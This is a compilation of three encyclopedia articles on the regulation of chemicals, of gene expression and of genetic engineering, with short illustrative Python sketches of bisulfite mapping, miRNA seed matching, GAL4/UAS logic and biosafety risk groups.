Strategic Approach to International Chemicals Management ( SAICM ) [ 1 ] – This initiative was adopted at the International Conference on Chemicals Management (ICCM), which took place from 4–6 February 2006 in Dubai and gathered governments as well as intergovernmental and non-governmental organizations. It defines a policy framework to foster the sound worldwide management of chemicals.
This initiative covers everything from risk assessments of chemicals and harmonized labeling to tackling obsolete and stockpiled products. It includes provisions for national centres aimed at helping the developing world, training staff in chemical safety, and dealing with spills and accidents. SAICM is a voluntary agreement.
A second International Conference on Chemicals Management (ICCM2), held in May 2009 in Geneva, aimed to enhance synergies and cost-effectiveness and to promote SAICM's multi-sectoral nature.
Globally Harmonized System of Classification and Labeling of Chemicals (GHS) [ 2 ]
The “Globally Harmonized System of Classification and Labelling of Chemicals” (GHS) proposes harmonized hazard communication elements, including labels and safety data sheets. It was adopted by the United Nations Economic Commission for Europe (UNECE) in 2002. The system aims to ensure better protection of human health and the environment during the handling of chemicals, including their transport and use. Chemicals are classified on the basis of their hazards. Once fully implemented, this harmonization will facilitate trade.
Stockholm Convention [1] –
The Stockholm Convention is a global treaty to protect human health and the environment from persistent organic pollutants (POPs). It entered into force on 17 May 2004, and over 150 countries have signed the Convention. The Convention initially covered 12 substances; in May 2009, nine new chemicals were proposed for listing.
Rotterdam Convention [ 3 ] –
The objectives of the Rotterdam Convention are:
The text of the Convention was adopted on 10 September 1998 by a Conference in Rotterdam, the Netherlands. The Convention entered into force on 24 February 2004. The Convention creates legally binding obligations for the implementation of the Prior Informed Consent (PIC) procedure.
Basel Convention [ 4 ] –
The Basel Convention on the Control of Transboundary Movements of Hazardous Wastes and their Disposal is a global environmental agreement on hazardous and other wastes. It came into force in 1992. The Convention has 172 Parties and aims to protect human health and the environment against the adverse effects resulting from the generation, management, transboundary movements and disposal of hazardous and other wastes.
Montreal Protocol [ 5 ] [ 6 ] – The Montreal Protocol was a globally coordinated regulatory action that sought to regulate ozone-depleting chemicals. 191 countries have ratified the treaty.
Global Framework on Chemicals –
The plan was adopted on 30 September 2023 in Bonn at the fifth session of the International Conference on Chemicals Management organized by the UN Environment Programme (UNEP). [ 7 ]
USA : [ 8 ] The Environmental Protection Agency (EPA) of the US announced in 2009 that the chemicals management laws would be strengthened, and that it would initiate a comprehensive approach to enhance the chemicals management program, including:
Chemicals are regulated under various laws including the Toxic Substances Control Act (TSCA). In 2010, Congress was considering a new law entitled the Safe Chemicals Act . [ 9 ] Over the following several years, the Senate considered a number of legislative texts to amend the TSCA. These included the Safe Chemicals Act , several versions of which were introduced by Senator Frank Lautenberg (D-NJ), with the latest in 2013, and the Chemical Safety Improvement Act (S. 1009, CSIA) introduced by Senators Lautenberg and David Vitter (R-LA) in 2013. Senator Lautenberg died shortly after CSIA's introduction, and over time his mantle was picked up by Senator Tom Udall (D-NM), who continued to work with Senator Vitter on revisions to the CSIA. The result of that effort was the Frank R. Lautenberg Chemical Safety for the 21st Century Act , passed by the Senate on December 17, 2015. The Toxic Substances Control Act (TSCA) Modernization Act of 2015 (H.R. 2576) passed the House of Representatives on June 23, 2015. [ 10 ] Revised legislation, which resolved differences between the House and Senate versions, was forwarded to the President on June 14, 2016. [ 11 ] President Obama signed the bill into law on June 22, 2016. The Senator's widow, Bonnie Lautenberg, was present at the White House signing ceremony. [ 12 ]
EU : Chemicals in Europe are managed by the REACH [ 13 ] [ 14 ] (Registration, Evaluation, Authorisation and Restriction of Chemicals) and the CLP [ 15 ] (Classification, Labelling and Packaging) regulations. Specific regulations exist for specific families of products such as fertilizers, detergents, explosives, pyrotechnic articles and drug precursors. [ 16 ]
Canada : In Canada, the Chemicals Management Plan [ 17 ] is responsible for designating priority chemicals, gathering public information about those chemicals, and generating risk assessment and management strategies.
A study defined a ' planetary boundary ' for novel entities such as plastic and chemical pollution and concluded that it has been crossed, suggesting – alongside many other studies and indicators – that more and improved regulation, or related changes (e.g. in enforcement or trade), is necessary. [ 18 ] [ 19 ]
Using artificial intelligence algorithms from drug discovery, researchers generated 40,000 potential chemical weapon candidates, [ 20 ] [ 21 ] a finding that may be relevant to the timely regulation of chemicals and related products that could be used to manufacture the viable fraction of those candidates. [ citation needed ] According to a senior author of the study, synthesizing these chemicals to cause real harm would be the more difficult part, and certain molecules needed to do so are known and regulated; however, some viable candidates may require only compounds that are currently unregulated. [ 22 ]
Other issues include: | https://en.wikipedia.org/wiki/Regulation_of_chemicals |
Regulation of gene expression , or gene regulation , [ 1 ] includes a wide range of mechanisms that are used by cells to increase or decrease the production of specific gene products ( protein or RNA ). Sophisticated programs of gene expression are widely observed in biology, for example to trigger developmental pathways, respond to environmental stimuli, or adapt to new food sources. Virtually any step of gene expression can be modulated, from transcriptional initiation , to RNA processing , and to the post-translational modification of a protein. Often, one gene regulator controls another, and so on, in a gene regulatory network .
Gene regulation is essential for viruses , prokaryotes and eukaryotes as it increases the versatility and adaptability of an organism by allowing the cell to express protein when needed. Although as early as 1951, Barbara McClintock showed interaction between two genetic loci, Activator ( Ac ) and Dissociator ( Ds ), in the color formation of maize seeds, the first discovery of a gene regulation system is widely considered to be the identification in 1961 of the lac operon , discovered by François Jacob and Jacques Monod , in which some enzymes involved in lactose metabolism are expressed by E. coli only in the presence of lactose and absence of glucose.
In multicellular organisms, gene regulation drives cellular differentiation and morphogenesis in the embryo, leading to the creation of different cell types that possess different gene expression profiles from the same genome sequence. Although this does not explain how gene regulation originated, evolutionary biologists include it as a partial explanation of how evolution works at a molecular level , and it is central to the science of evolutionary developmental biology ("evo-devo").
Any step of gene expression may be modulated, from signaling to transcription to post-translational modification of a protein. The following is a list of stages where gene expression is regulated, where the most extensively utilized point is transcription initiation, the first stage in transcription: [ citation needed ]
In eukaryotes, the accessibility of large regions of DNA can depend on its chromatin structure, which can be altered as a result of histone modifications directed by DNA methylation , ncRNA , or DNA-binding protein . Hence these modifications may up or down regulate the expression of a gene. Some of these modifications that regulate gene expression are inheritable and are referred to as epigenetic regulation . [ citation needed ]
Transcription of DNA is dictated by its structure. In general, the density of its packing is indicative of the frequency of transcription. Octameric protein complexes called histones together with a segment of DNA wound around the eight histone proteins (together referred to as a nucleosome) are responsible for the amount of supercoiling of DNA, and these complexes can be temporarily modified by processes such as phosphorylation or more permanently modified by processes such as methylation . Such modifications are considered to be responsible for more or less permanent changes in gene expression levels. [ 2 ]
Methylation of DNA is a common method of gene silencing. DNA is typically methylated by methyltransferase enzymes on cytosine nucleotides in a CpG dinucleotide sequence (also called " CpG islands " when densely clustered). Analysis of the pattern of methylation in a given region of DNA (which can be a promoter) can be achieved through a method called bisulfite mapping. Methylated cytosine residues are unchanged by the bisulfite treatment, whereas unmethylated ones are converted to uracil. The differences are analyzed by DNA sequencing or by methods developed to quantify SNPs, such as Pyrosequencing ( Biotage ) or MassArray ( Sequenom ), measuring the relative amounts of C/T at the CG dinucleotide. Abnormal methylation patterns are thought to be involved in oncogenesis. [ 3 ]
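As a rough illustration of the logic behind bisulfite mapping, the following sketch (in Python) simulates the conversion step and the quantification of methylation at a single CpG site; the sequence, methylated positions, and read counts used here are hypothetical examples, not data from any particular study.

```python
# Minimal sketch of bisulfite-mapping logic (illustrative only; the sequence,
# methylated positions, and read counts below are hypothetical).

def bisulfite_convert(seq, methylated_positions):
    """Simulate bisulfite treatment: unmethylated C -> U (read as T after PCR),
    methylated C is protected and remains C."""
    out = []
    for i, base in enumerate(seq):
        if base == "C" and i not in methylated_positions:
            out.append("T")          # unmethylated cytosine is deaminated
        else:
            out.append(base)         # methylated C (and A/G/T) unchanged
    return "".join(out)

def methylation_fraction(c_reads, t_reads):
    """Fraction of reads still showing C at a CpG site ~ estimated methylation level."""
    total = c_reads + t_reads
    return c_reads / total if total else 0.0

if __name__ == "__main__":
    promoter = "ACGTCGACGGCGTA"      # hypothetical promoter fragment
    methylated = {4, 10}             # hypothetical methylated cytosine positions
    print(bisulfite_convert(promoter, methylated))   # unmethylated Cs appear as T
    # e.g. 37 reads show C and 13 show T at one CpG site -> 74% methylation
    print(round(methylation_fraction(37, 13), 2))
```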
Histone acetylation is also an important process in transcription. Histone acetyltransferase enzymes (HATs) such as CREB-binding protein also dissociate the DNA from the histone complex, allowing transcription to proceed. Often, DNA methylation and histone deacetylation work together in gene silencing . The combination of the two seems to be a signal for DNA to be packed more densely, lowering gene expression. [ citation needed ]
Regulation of transcription thus controls when transcription occurs and how much RNA is created. Transcription of a gene by RNA polymerase can be regulated by several mechanisms. Specificity factors alter the specificity of RNA polymerase for a given promoter or set of promoters, making it more or less likely to bind to them (i.e., sigma factors used in prokaryotic transcription ). Repressors bind to the operator , a DNA sequence close to or overlapping the promoter region, impeding RNA polymerase's progress along the strand and thus impeding the expression of the gene; regulation by a repressor occurs, for example, in the lac operon. General transcription factors position RNA polymerase at the start of a protein-coding sequence and then release the polymerase to transcribe the mRNA. Activators enhance the interaction between RNA polymerase and a particular promoter , encouraging the expression of the gene. Activators do this by increasing the attraction of RNA polymerase for the promoter, through interactions with subunits of the RNA polymerase or indirectly by changing the structure of the DNA. Enhancers are sites on the DNA helix that are bound by activators in order to loop the DNA bringing a specific promoter to the initiation complex. Enhancers are much more common in eukaryotes than prokaryotes, where only a few examples exist (to date). [ 4 ] Silencers are regions of DNA sequences that, when bound by particular transcription factors, can silence expression of the gene.
RNA can be an important regulator of gene activity, e.g. by microRNA (miRNA), antisense-RNA , or long non-coding RNA (lncRNA). LncRNAs differ from mRNAs in that they have specified subcellular locations and functions. They were first discovered in the nucleus and chromatin , and their known localizations and functions are now highly diverse. Some reside in chromatin, where they interact with proteins. Such chromatin-associated lncRNAs ultimately affect gene expression in neuronal disorders such as Parkinson's , Huntington's , and Alzheimer's disease , while others, such as PNCTR (a pyrimidine-rich non-coding transcript), play a role in lung cancer . Given their role in disease, lncRNAs are potential biomarkers and may be useful targets for drugs or gene therapy , although there are no approved drugs that target lncRNAs yet. The number of lncRNAs in the human genome remains poorly defined, but some estimates range from 16,000 to 100,000 lnc genes. [ 5 ]
Epigenetics refers to modifications of genes that do not change the DNA or RNA sequence. Epigenetic modifications are also a key factor influencing gene expression . They occur on genomic DNA and histones, and these chemical modifications regulate gene expression. There are several modifications of DNA (usually methylation ) and more than 100 modifications of RNA in mammalian cells. Such modifications result in altered protein binding to DNA and changes in RNA stability and translation efficiency . [ 6 ]
In vertebrates, the majority of gene promoters contain a CpG island with numerous CpG sites . [ 7 ] When many of a gene's promoter CpG sites are methylated the gene becomes silenced. [ 8 ] Colorectal cancers typically have 3 to 6 driver mutations and 33 to 66 hitchhiker or passenger mutations. [ 9 ] However, transcriptional silencing may be of more importance than mutation in causing progression to cancer. For example, in colorectal cancers about 600 to 800 genes are transcriptionally silenced by CpG island methylation (see regulation of transcription in cancer ). Transcriptional repression in cancer can also occur by other epigenetic mechanisms, such as altered expression of microRNAs . [ 10 ] In breast cancer, transcriptional repression of BRCA1 may occur more frequently by over-expressed microRNA-182 than by hypermethylation of the BRCA1 promoter (see Low expression of BRCA1 in breast and ovarian cancers ).
One of the cardinal features of addiction is its persistence. The persistent behavioral changes appear to be due to long-lasting changes, resulting from epigenetic alterations affecting gene expression, within particular regions of the brain. [ 11 ] Drugs of abuse cause three types of epigenetic alteration in the brain. These are (1) histone acetylations and histone methylations , (2) DNA methylation at CpG sites , and (3) epigenetic downregulation or upregulation of microRNAs . [ 11 ] [ 12 ] (See Epigenetics of cocaine addiction for some details.)
Chronic nicotine intake in mice alters brain cell epigenetic control of gene expression through acetylation of histones . This increases expression in the brain of the protein FosB, important in addiction. [ 13 ] Cigarette addiction was also studied in about 16,000 humans, including never smokers, current smokers, and those who had quit smoking for up to 30 years. [ 14 ] In blood cells, more than 18,000 CpG sites (of the roughly 450,000 analyzed CpG sites in the genome) had frequently altered methylation among current smokers. These CpG sites occurred in over 7,000 genes, or roughly a third of known human genes. The majority of the differentially methylated CpG sites returned to the level of never-smokers within five years of smoking cessation. However, 2,568 CpGs among 942 genes remained differentially methylated in former versus never smokers. Such remaining epigenetic changes can be viewed as “molecular scars” [ 12 ] that may affect gene expression.
In rodent models, drugs of abuse, including cocaine, [ 15 ] methamphetamine, [ 16 ] [ 17 ] alcohol [ 18 ] and tobacco smoke products, [ 19 ] all cause DNA damage in the brain. During repair of DNA damages some individual repair events can alter the methylation of DNA and/or the acetylations or methylations of histones at the sites of damage, and thus can contribute to leaving an epigenetic scar on chromatin. [ 20 ]
Such epigenetic scars likely contribute to the persistent epigenetic changes found in addiction.
In mammals, methylation of cytosine in DNA is a major regulatory mediator. Methylated cytosines primarily occur in dinucleotide sequences where cytosine is followed by a guanine, a CpG site . The total number of CpG sites in the human genome is approximately 28 million, [ 21 ] and generally about 70% of all CpG sites have a methylated cytosine. [ 22 ]
In a rat, a painful learning experience, contextual fear conditioning , can result in a life-long fearful memory after a single training event. [ 23 ] Cytosine methylation is altered in the promoter regions of about 9.17% of all genes in the hippocampus neuron DNA of a rat that has been subjected to a brief fear conditioning experience. [ 24 ] The hippocampus is where new memories are initially stored.
Methylation of CpGs in a promoter region of a gene represses transcription [ 25 ] while methylation of CpGs in the body of a gene increases expression. [ 26 ] TET enzymes play a central role in demethylation of methylated cytosines. Demethylation of CpGs in a gene promoter by TET enzyme activity increases transcription of the gene. [ 27 ]
When contextual fear conditioning is applied to a rat, more than 5,000 differentially methylated regions (DMRs) (of 500 nucleotides each) occur in the rat hippocampus neural genome both one hour and 24 hours after the conditioning. [ 24 ] This causes about 500 genes to be up-regulated (often due to demethylation of CpG sites in a promoter region) and about 1,000 genes to be down-regulated (often due to newly formed 5-methylcytosine at CpG sites in a promoter region). The pattern of induced and repressed genes within neurons appears to provide a molecular basis for forming the first transient memory of this training event in the hippocampus of the rat brain. [ 24 ]
After the DNA is transcribed and mRNA is formed, there must be some sort of regulation on how much the mRNA is translated into proteins. Cells do this by modulating the capping, splicing, addition of a Poly(A) Tail, the sequence-specific nuclear export rates, and, in several contexts, sequestration of the RNA transcript. These processes occur in eukaryotes but not in prokaryotes. This modulation is a result of a protein or transcript that, in turn, is regulated and may have an affinity for certain sequences.
Three prime untranslated regions (3'-UTRs) of messenger RNAs (mRNAs) often contain regulatory sequences that post-transcriptionally influence gene expression. [ 28 ] Such 3'-UTRs often contain both binding sites for microRNAs (miRNAs) as well as for regulatory proteins. By binding to specific sites within the 3'-UTR, miRNAs can decrease gene expression of various mRNAs by either inhibiting translation or directly causing degradation of the transcript. The 3'-UTR also may have silencer regions that bind repressor proteins that inhibit the expression of a mRNA.
The 3'-UTR often contains miRNA response elements (MREs) . MREs are sequences to which miRNAs bind. These are prevalent motifs within 3'-UTRs. Among all regulatory motifs within the 3'-UTRs (e.g. including silencer regions), MREs make up about half of the motifs.
As of 2014, the miRBase web site, [ 29 ] an archive of miRNA sequences and annotations, listed 28,645 entries in 233 biologic species. Of these, 1,881 miRNAs were in annotated human miRNA loci. miRNAs were predicted to have an average of about four hundred target mRNAs (affecting expression of several hundred genes). [ 30 ] Friedman et al. [ 30 ] estimate that >45,000 miRNA target sites within human mRNA 3'-UTRs are conserved above background levels, and >60% of human protein-coding genes have been under selective pressure to maintain pairing to miRNAs.
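Such target sites are commonly predicted by "seed matching", i.e. searching a 3'-UTR for the reverse complement of the miRNA seed region (roughly nucleotides 2–8). The sketch below illustrates only that core idea; the miRNA and 3'-UTR sequences are hypothetical examples, and real prediction tools add conservation filters and context scoring on top of simple seed matching.

```python
# Illustrative sketch of miRNA seed matching, the core of most MRE predictions.
# The miRNA and 3'-UTR sequences here are hypothetical.

def reverse_complement(rna):
    pairs = {"A": "U", "U": "A", "G": "C", "C": "G"}
    return "".join(pairs[b] for b in reversed(rna))

def find_seed_matches(mirna, utr, seed_start=1, seed_end=8):
    """Return 0-based positions in the 3'-UTR that match the reverse
    complement of the miRNA seed (nucleotides 2-8, i.e. indices 1..7)."""
    seed = mirna[seed_start:seed_end]   # 7-nt seed region
    site = reverse_complement(seed)     # sequence a candidate MRE must contain
    return [i for i in range(len(utr) - len(site) + 1)
            if utr[i:i + len(site)] == site]

if __name__ == "__main__":
    mirna = "UGGAAUGUAAAGAAGUAUGUAU"    # example miRNA sequence (5'->3')
    utr = "AAACAUUCCAUGUCAACAUUCCAA"    # hypothetical 3'-UTR fragment
    print(find_seed_matches(mirna, utr))   # positions of candidate MREs
```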
Direct experiments show that a single miRNA can reduce the stability of hundreds of unique mRNAs. [ 31 ] Other experiments show that a single miRNA may repress the production of hundreds of proteins, but that this repression often is relatively mild (less than 2-fold). [ 32 ] [ 33 ]
The effects of miRNA dysregulation of gene expression seem to be important in cancer. [ 34 ] For instance, in gastrointestinal cancers, a 2015 paper identified nine miRNAs as epigenetically altered and effective in down-regulating DNA repair enzymes. [ 35 ]
The effects of miRNA dysregulation of gene expression also seem to be important in neuropsychiatric disorders, such as schizophrenia , bipolar disorder , major depressive disorder , Parkinson's disease , Alzheimer's disease and autism spectrum disorders. [ 36 ] [ 37 ] [ 38 ]
The translation of mRNA can also be controlled by a number of mechanisms, mostly at the level of initiation. Recruitment of the small ribosomal subunit can indeed be modulated by mRNA secondary structure, antisense RNA binding, or protein binding. In both prokaryotes and eukaryotes, a large number of RNA binding proteins exist, which often are directed to their target sequence by the secondary structure of the transcript, which may change depending on certain conditions, such as temperature or presence of a ligand (aptamer). Some transcripts act as ribozymes and self-regulate their expression.
A large number of studied regulatory systems come from developmental biology . Examples include:
Up-regulation is a process occurring within a cell, triggered by a signal (originating internally or externally to the cell), that results in increased expression of one or more genes and, as a result, of the proteins encoded by those genes. Conversely, down-regulation is a process resulting in decreased gene and corresponding protein expression.
Gene regulation can be summarized by the response of the respective system:
The GAL4/UAS system is an example of both an inducible and repressible system. Gal4 binds an upstream activation sequence (UAS) to activate the transcription of the GAL1/GAL7/GAL10 cassette. On the other hand, a MIG1 response to the presence of glucose can inhibit GAL4 and therefore stop the expression of the GAL1/GAL7/GAL10 cassette. [ 42 ]
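The inducible/repressible behaviour described for the GAL4/UAS system can be summarised as a simple truth table, sketched below; this abstraction treats galactose as the inducing signal and glucose (via MIG1) as the repressing signal, and is not a quantitative model of the underlying biology.

```python
# Toy sketch of the inducible/repressible logic described for GAL4/UAS.
# This abstracts the biology into a truth table; it is not a mechanistic model.

def gal_cassette_expressed(galactose_present, glucose_present):
    """GAL1/GAL7/GAL10 are transcribed when GAL4 is active at the UAS
    (induction) and not repressed via the MIG1 glucose response."""
    gal4_active = galactose_present     # induction signal
    mig1_repression = glucose_present   # repression signal
    return gal4_active and not mig1_repression

if __name__ == "__main__":
    for gal in (False, True):
        for glc in (False, True):
            print(f"galactose={gal!s:5} glucose={glc!s:5} -> "
                  f"expressed={gal_cassette_expressed(gal, glc)}")
```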
In general, most experiments investigating differential expression have used whole-cell extracts of RNA, called steady-state levels, to determine which genes changed and by how much. Such measurements are, however, not informative about where the regulation has occurred and may mask conflicting regulatory processes ( see post-transcriptional regulation ), yet steady-state levels remain the most commonly analysed quantity ( quantitative PCR and DNA microarray ).
When studying gene expression, there are several methods to look at the various stages. In eukaryotes these include: | https://en.wikipedia.org/wiki/Regulation_of_gene_expression |
The regulation of genetic engineering varies widely by country. Countries such as the United States, Canada, Lebanon and Egypt use substantial equivalence as the starting point when assessing safety, while many countries such as those in the European Union, Brazil and China authorize GMO cultivation on a case-by-case basis. Many countries allow the import of GM food with authorization, but either do not allow its cultivation (Russia, Norway, Israel) or have provisions for cultivation, but no GM products are yet produced (Japan, South Korea). Most countries that do not allow for GMO cultivation do permit research. [ 2 ] Most (85%) of the world's GMO crops are grown in the Americas (North and South). [ 1 ] One of the key issues concerning regulators is whether GM products should be labeled. Labeling of GMO products in the marketplace is required in 64 countries. [ 3 ] Labeling can be mandatory up to a threshold GM content level (which varies between countries) or voluntary. A study investigating voluntary labeling in South Africa found that 31% of products labeled as GMO-free had a GM content above 1.0%. [ 4 ] In Canada and the US labeling of GM food is voluntary, [ 5 ] while in Europe all food (including processed food ) or feed which contains greater than 0.9% of approved GMOs must be labelled. [ 6 ] [ 7 ]
There is a scientific consensus [ 8 ] [ 9 ] [ 10 ] [ 11 ] that currently available food derived from GM crops poses no greater risk to human health than conventional food, [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] but that each GM food needs to be tested on a case-by-case basis before introduction. [ 17 ] [ 18 ] [ 19 ] Nonetheless, members of the public are much less likely than scientists to perceive GM foods as safe. [ 20 ] [ 21 ] [ 22 ] [ 23 ] The legal and regulatory status of GM foods varies by country, with some nations banning or restricting them, and others permitting them with widely differing degrees of regulation. [ 24 ] [ 25 ] [ 26 ] [ 27 ]
There is no evidence to support the idea that the consumption of approved GM food has a detrimental effect on human health. [ 28 ] [ 29 ] [ 30 ] Some scientists and advocacy groups, such as Greenpeace and World Wildlife Fund , have however called for additional and more rigorous testing for GM food. [ 29 ]
The development of a regulatory framework concerning genetic engineering began in 1975, at Asilomar , California. The first use of Recombinant DNA (rDNA) technology had just been successfully accomplished by Stanley Cohen and Herbert Boyer two years previously and the scientific community recognized that as well as benefits this technology could also pose some risks. [ 31 ] The Asilomar meeting recommended a set of guidelines regarding the cautious use of recombinant technology and any products resulting from that technology. [ 32 ] The Asilomar recommendations were voluntary, but in 1976 the US National Institutes of Health (NIH) formed an rDNA advisory committee. [ 33 ] This was followed by other regulatory offices (the United States Department of Agriculture (USDA), Environmental Protection Agency (EPA) and Food and Drug Administration (FDA)), effectively making all rDNA research tightly regulated in the US. [ 34 ]
In 1982 the Organisation for Economic Co-operation and Development (OECD) released a report into the potential hazards of releasing genetically modified organisms (GMOs) into the environment as the first transgenic plants were being developed. [ 35 ] As the technology improved and genetically modified organisms moved from model organisms to potential commercial products, the US established a committee at the Office of Science and Technology Policy (OSTP) to develop mechanisms to regulate the developing technology. [ 34 ] In 1986 the OSTP assigned regulatory approval of genetically modified plants in the US to the USDA, FDA and EPA. [ 36 ]
The basic concepts for the safety assessment of foods derived from GMOs have been developed in close collaboration under the auspices of the OECD , the World Health Organization (WHO) and Food and Agriculture Organization (FAO). A first joint FAO/WHO consultation in 1990 resulted in the publication of the report ‘Strategies for Assessing the Safety of Foods Produced by Biotechnology’ in 1991. [ 37 ] Building on that, an international consensus was reached by the OECD's Group of National Experts on Safety in Biotechnology, for assessing biotechnology in general, including field testing GM crops. [ 38 ] That Group met again in Bergen, Norway in 1992 and reached consensus on principles for evaluating the safety of GM food; its report, ‘The safety evaluation of foods derived by modern technology – concepts and principles’ was published in 1993. [ 39 ] That report recommends conducting the safety assessment of a GM food on a case-by-case basis through comparison to an existing food with a long history of safe use. This basic concept has been refined in subsequent workshops and consultations organized by the OECD, WHO, and FAO, and the OECD in particular has taken the lead in acquiring data and developing standards for conventional foods to be used in assessing substantial equivalence . [ 40 ] [ 41 ]
The Cartagena Protocol on Biosafety was adopted on 29 January 2000 and entered into force on 11 September 2003. [ 42 ] It is an international treaty that governs the transfer, handling, and use of genetically modified (GM) organisms. It is focused on movement of GMOs between countries and has been called a de facto trade agreement. [ 43 ] One hundred and seventy-two countries [ 44 ] are members of the Protocol and many use it as a reference point for their own regulations. [ 45 ] Also in 2003 the Codex Alimentarius Commission of the FAO/WHO adopted a set of "Principles and Guidelines on foods derived from biotechnology" to help countries coordinate and standardize regulation of GM food to help ensure public safety and facilitate international trade, [ 46 ] and updated its guidelines for import and export of food in 2004. [ 47 ]
The European Union first introduced laws requiring GMOs to be labelled in 1997. [ 48 ] In 2013, Connecticut became the first state to enact a labeling law in the US, although it would not take effect until other states followed suit. [ 49 ]
Institutions that conduct certain types of scientific research must obtain permission from government authorities and ethical committees before they conduct any experiments. Universities and research institutes generally have a special committee that is responsible for approving any experiments that involve genetic engineering . Many experiments also need permission from a national regulatory group or legislation. All staff must be trained in the use of GMOs and in some laboratories a biological control safety officer is appointed. All laboratories must gain approval from their regulatory agency to work with GMOs and all experiments must be documented. [ 50 ] As of 2008 there have been no major accidents with GMOs in the lab. [ 51 ]
GMOs were initially covered by adapting existing legislation in place for chemicals or other purposes, with many countries later developing specific policies aimed at genetic engineering. [ 52 ] These are often derived from regulations and guidelines in place for the non-GMO version of the organism, although they are more stringent. In many countries the regulations are now diverging, even though many of the risks and procedures are similar. Sometimes different agencies are even responsible, notably in the Netherlands, where the Ministry of the Environment covers GMOs and the Ministry of Social Affairs covers the human pathogens they are derived from. [ 51 ]
There is a near universal system for assessing the relative risks associated with GMOs and other agents to laboratory staff and the community. They are then assigned to one of four risk categories based on their virulence, the severity of disease, the mode of transmission, and the availability of preventive measures or treatments. There are some differences in how these categories are defined, such as the World Health Organisation (WHO) including dangers to animals and the environment in their assessments. When there are varying levels of virulence the regulators base their classification on the highest. Accordingly, there are four biosafety levels that a laboratory can fall into, ranging from level 1 (which is suitable for working with agents not associated with disease) to level 4 (working with life-threatening agents). Different countries use different nomenclature to describe the levels and can have different requirements for what can be done at each level. [ 51 ]
In Europe the use of living GMOs are regulated by the European Directive on the contained use of genetically modified microorganisms (GMMs). [ 50 ] The regulations require risk assessments before use of any contained GMOs is started and assurances that the correct controls are in place. It provides the minimal standards for using GMMs, with individual countries allowed to enforce stronger controls. [ 53 ] In the UK the Genetically Modified Organisms (Contained Use) Regulations 2014 provides the framework researchers must follow when using GMOs. Other legislation may be applicable depending on what research is carried out. For workplace safety these include the Health and Safety at Work Act 1974 , the Management of Health and Safety at Work Regulations 1999 , the Carriage of Dangerous Goods legislation and the Control of Substances Hazardous to Health Regulations 2002 . Environmental risks are covered by Section 108(1) of the Environmental Protection Act 1990 and The Genetically Modified Organisms (Risk assessment) (Records and Exemptions) Regulations 1996. [ 54 ]
In the US the National Institutes of Health (NIH) classifies GMOs into four risk groups. Risk group 1 is not associated with any diseases, risk group 2 is associated with diseases that are not serious, risk group 3 is associated with serious diseases where treatments are available, and risk group 4 is for serious diseases with no known treatments. [ 50 ] In 1992 the Occupational Safety and Health Administration determined that its existing legislation already adequately covered the safety of laboratory workers using GMOs. [ 52 ]
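A minimal sketch of this four-tier scheme is given below, using the NIH risk-group descriptions from this section and the "classify on the highest group" rule mentioned earlier; the example construct at the end is hypothetical, and actual assignments of specific agents vary by country and regulator.

```python
# Illustrative encoding of the four-tier risk-group scheme described above.
# Descriptions paraphrase the text; real assignments of specific agents
# depend on the jurisdiction and regulator.

RISK_GROUPS = {
    1: "not associated with any diseases",
    2: "associated with diseases that are not serious",
    3: "associated with serious diseases where treatments are available",
    4: "associated with serious diseases with no known treatments",
}

def required_classification(risk_groups_of_components):
    """When components fall into several risk groups, regulators base the
    classification on the highest group (as noted earlier in the text)."""
    return max(risk_groups_of_components)

if __name__ == "__main__":
    # hypothetical construct: a risk group 1 host carrying a sequence
    # derived from a risk group 2 agent
    group = required_classification([1, 2])
    print(f"Classified as risk group {group}: {RISK_GROUPS[group]}")
```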
Australia has an exempt dealings category for genetically modified organisms that pose only a low risk. These include systems using standard laboratory strains as the hosts and recombinant DNA that does not code for a vertebrate toxin or is not derived from a micro-organism that can cause disease in humans. Exempt dealings usually do not require approval from the national regulator. GMOs that pose a low risk if certain management practices are complied with are classified as notifiable low risk dealings. The final classification is for any uses of GMOs that do not meet the previous criteria. These are known as licensed dealings and include cloning any genes that code for vertebrate toxins or using hosts that are capable of causing disease in humans. Licensed dealings require the approval of the national regulator. [ 55 ]
Work with exempt GMOs does not need to be carried out in certified laboratories. All others must be contained in Physical Containment level 1 (PC1) or Physical Containment level 2 (PC2) laboratories. Laboratory work with GMOs classified as low risk, which includes knockout mice , is carried out in a PC1 laboratory. This is the case for modifications that do not confer an advantage to the animal and do not cause it to secrete any infectious agents. If the laboratory strain used is not covered by exempt dealings, or the inserted DNA could code for a pathogenic gene, the work must be carried out in a PC2 laboratory. [ 55 ]
The approaches taken by governments to assess and manage the risks associated with the use of genetic engineering technology and the development and release of GMOs vary from country to country, with some of the most marked differences occurring between the United States and Europe. [ 56 ] The United States takes a less hands-on approach to the regulation of GMOs than Europe, with the FDA and USDA only looking over pesticide and plant-health aspects of GMOs. [ 57 ] Despite the overall global increase in the production of GMOs, the European Union has continued to stall the full integration of GMOs into its food supply. [ 58 ] This has affected various countries, including the United States, when trading with the EU. [ 58 ] [ 59 ]
The European Union enacted regulatory laws in 2003 that provided possibly the most stringent GMO regulations in the world. [ 6 ] All GMOs, along with irradiated food , are considered "new food" and subject to extensive, case-by-case, science-based food evaluation by the European Food Safety Authority (EFSA). The criteria for authorization fall in four broad categories: "safety", "freedom of choice", "labelling", and "traceability". [ 60 ]
The European Parliament's Committee on the Environment, Public Health, and Consumer Protection pushed forward and adopted a "safety first" principle regarding GMOs, calling for liability to be imposed for any negative health consequences from GMOs.
In developing GM crop and GM food regulations, the EU has been challenged to create a policy environment that is (a) efficient, (b) predictable, (c) accountable, (d) durable or (e) inter-jurisdictionally aligned. [ 61 ] However, although the European Union has had relatively strict regulations regarding genetically modified food, Europe is now allowing newer versions of modified maize and other agricultural produce. Also, the level of GMO acceptance in the European Union varies across its countries, with Spain and Portugal being more permissive of GMOs than France and the Nordic countries. [ 62 ] One notable exception, however, is Sweden. In this country, the government has declared that the GMO definition (according to Directive 2001/18/EC [ 63 ] ) stipulates that foreign DNA needs to be present in an organism for it to qualify as a genetically modified organism. Organisms that have the foreign DNA removed (for example via selective breeding [ 64 ] ) therefore do not qualify as GMOs, even if gene editing has been used to make the organism. [ 65 ]
In June 2014 the European Parliament approved allowing individual member states to restrict or ban the growth of GM crops within their territory. Austria, France, Greece, Hungary, Germany, and Luxembourg had prohibited the growth or sale of bioengineered foods in their territory in 2015. [ 66 ] Scotland also announced its rejection. By 2015, sixteen countries had declared that they wanted to opt out of EU-approved GM crops, including GMOs from major companies like Monsanto , Dow , Syngenta and Pioneer. [ 67 ]
